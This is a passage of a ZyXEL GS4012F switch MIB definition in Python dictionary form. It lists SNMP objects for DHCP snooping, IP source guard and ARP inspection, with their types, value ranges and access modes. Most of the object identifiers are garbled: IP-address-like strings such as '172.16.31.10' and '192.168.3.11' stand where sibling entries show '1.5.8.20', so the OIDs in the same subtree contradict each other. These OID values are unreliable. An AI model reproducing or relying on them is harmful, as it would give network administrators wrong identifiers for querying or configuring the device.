"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpPortEntryTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpPortEntryRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""0 means unlimited""",
}, # column
"dhcpSnpBindTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpBindEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.3.1",
"status" : "current",
"linkage" : [
"dhcpSnpBindEntryMac",
"dhcpSnpBindEntryVid",
],
"description" :
"""""",
}, # row
"dhcpSnpBindEntryMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryLease" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDb" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5",
}, # node
"dhcpSnpDbAbort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbWriteDelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbUrl" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbUrlRenew" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStat" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5",
}, # node
"dhcpSnpDbStatClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatDelayExpiry" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatAbortExpiry" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastSuccTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastFailTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastFailReason" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatTotalAttempt" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatStartupFail" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccTrans" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailTrans" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccRead" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailRead" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.13",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccWrite" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.14",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailWrite" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.15",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastIgnoreBindCol" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.17",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: binding collision""",
}, # scalar
"dhcpSnpDbStatLastIgnoreExpireLease" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.18",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: expired leases""",
}, # scalar
"dhcpSnpDbStatLastIgnoreInvalidIntf" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.19",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: invalid interface""",
}, # scalar
"dhcpSnpDbStatLastIgnoreUnsuppVlan" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.3.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: unsupported vlans""",
}, # scalar
"dhcpSnpDbStatLastIgnoreParse" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.21",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: parsing error""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreBindCol" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.22",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: binding collision""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreExpireLease" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.23",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: expired leases""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreInvalidIntf" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.24",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: invalid interface""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreUnsuppVlan" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.25",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: unsupported vlans""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreParse" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.26",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: parsing error""",
}, # scalar
"dhcpSnpDbStatLastIgnoreTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.27",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDhcpVlan" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.6",
}, # node
"dhcpSnpDhcpVlanVid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.6.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "4094"
},
],
"range" : {
"min" : "0",
"max" : "4094"
},
},
},
"access" : "readwrite",
"description" :
"""0: disable DHCP VLAN.""",
}, # scalar
"ipsg" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101",
}, # node
"ipsgTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1",
"status" : "current",
"description" :
"""""",
}, # table
"ipsgEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"ipsgEntryMac",
"ipsgEntryVid",
],
"description" :
"""""",
}, # row
"ipsgEntryMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ipsgEntryLease" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""second""",
}, # column
"ipsgEntryType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dhcp" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0 means any port""",
}, # column
"ipsgEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspect" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102",
}, # node
"arpInspectSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1",
}, # node
"arpInspectState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterAgingTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLog" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3",
}, # node
"arpInspectLogEntries" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "1024"
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogRate" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "1024"
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogInterval" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1",
"status" : "current",
"linkage" : [
"arpInspectVlanVid",
],
"description" :
"""""",
}, # row
"arpInspectVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectVlanLog" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "1"
},
"none" : {
"nodetype" : "namednumber",
"number" : "2"
},
"permit" : {
"nodetype" : "namednumber",
"number" : "3"
},
"deny" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectVlanStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1",
"status" : "current",
"linkage" : [
"arpInspectPortIndex",
],
"description" :
"""""",
}, # row
"arpInspectPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectPortTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"trusted" : {
"nodetype" : "namednumber",
"number" : "1"
},
"untrusted" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "15"
},
],
"range" : {
"min" : "1",
"max" : "15"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.2",
}, # node
"arpInspectFilterClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectFilterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"arpInspectFilterMac",
"arpInspectFilterVid",
],
"description" :
"""""",
}, # row
"arpInspectFilterMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterExpiry" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterReason" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"macVid" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ip" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectLogTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectLogEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1",
"status" : "current",
"linkage" : [
"arpInspectLogMac",
"arpInspectLogVid",
"arpInspectLogPort",
"arpInspectLogIp",
],
"description" :
"""""",
}, # row
"arpInspectLogMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
